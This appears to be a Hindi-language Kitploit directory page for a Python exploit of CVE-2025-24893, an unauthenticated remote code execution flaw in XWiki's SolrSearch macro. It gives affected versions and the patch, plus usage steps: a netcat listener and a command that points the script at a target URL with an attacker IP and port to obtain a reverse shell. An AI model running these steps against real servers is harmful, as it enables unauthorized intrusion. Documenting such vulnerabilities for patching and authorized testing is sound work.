Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hasecto/cve-2025-24893
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhasecto/cve-2025-24893

CVE-2025-24893

एक्सविकी में रिमोट कोड एक्जीक्यूशन (RCE) एक्सप्लॉइट

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893

एक्सविकी में रिमोट कोड एक्जीक्यूशन (RCE) एक्सप्लॉइट

CVE-2025-24893 के लिए Python3 में एक एक्सप्लॉइट, जो एक्सविकी प्लेटफ़ॉर्म को प्रभावित करने वाली एक महत्वपूर्ण बिना प्रमाणीकरण के रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता है।

यह स्क्रिप्ट SolrSearch मैक्रो घटक के अंदर एक कोड/एक्सप्रेशन इंजेक्शन (CWE-95) दोष का शोषण करती है। यह दोष हमलावरों को अंतर्निहित ऑपरेटिंग सिस्टम पर मनमाना Groovy/Java कोड निष्पादित करने की अनुमति देता है। एक्सप्लॉइट स्वचालित रूप से Base64 एन्कोडिंग करता है ताकि Java के Runtime.getRuntime().exec() फ़ंक्शन की कमांड इंटरप्रिटेशन सीमाओं से बचा जा सके।

📊 भेद्यता विवरण

  • CVE आईडी: CVE-2025-24893
  • CVSS स्कोर: 9.8 क्रिटिकल (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (एक्सप्रेशन लैंग्वेज एक्सप्रेशन / एवल इंजेक्शन का अनुचित न्यूट्रलाइज़ेशन)
  • लक्षित घटक: /bin/get/Main/SolrSearch (text पैरामीटर के माध्यम से)

🔍 प्रभावित संस्करण

  • 5.3-milestone-2 से 15.10.10 तक के सभी संस्करण
  • 16.0.0-rc-1 से 16.4.0 तक के संस्करण

🚀 उपयोग कैसे करें

1. Kali Linux पर अपना (Netcat) लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

2. एक्सप्लॉइट चलाएं:

root@kitploit:~
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>

उदाहरण:

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

आवश्यक निर्भरता स्थापित करने के लिए:

root@kitploit:~
pip install requests

🛡️ समाधान

अपने XWiki इंस्टेंस को आधिकारिक पैच किए गए संस्करणों में से किसी एक में अपडेट करें: 15.10.11, 16.4.1, 16.5.0-rc-1 (या उच्चतर)।

⚠️ कानूनी अस्वीकरण (Disclaimer)

यह स्क्रिप्ट विशेष रूप से शैक्षिक उद्देश्यों, अधिकृत सुरक्षा ऑडिट और पेनिट्रेशन टेस्टिंग (Pentest) के लिए विकसित की गई है। लेखक इस उपकरण के किसी भी दुरुपयोग, क्षति या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। पूर्व अनुमति के बिना लक्ष्यों के विरुद्ध इस स्क्रिप्ट का उपयोग सख्ती से अवैध है।

टूल डाउनलोड करें